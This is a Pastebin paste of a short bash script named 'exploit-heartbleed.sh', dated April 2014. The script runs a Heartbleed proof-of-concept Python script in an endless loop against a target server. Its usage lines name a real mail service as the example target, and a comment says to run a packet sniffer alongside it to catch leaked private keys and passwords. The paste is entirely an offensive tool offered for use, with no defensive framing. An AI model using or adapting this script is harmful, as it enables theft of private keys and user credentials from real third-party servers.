Advertisement
Guest User

exploit-heartbleed.sh

a guest
Apr 10th, 2014
6,827
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.27 KB | None | 0 0
  1. #! /bin/bash
  2.  
  3. # Usage : ./exploit-heartbleed.sh mail.yahoo.com -p 25 -s smtp
  4. # Usage : ./exploit-heartbleed.sh mail.yahoo.com
  5.  
  6. # On the other terminal, run sudo ./ngrep-heartbleed.sh "private key|pass" 443
  7.  
  8. while [ 1 ]; do python poc-tls-samiux.py $1 $2 $3 $4 $5 $6; done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement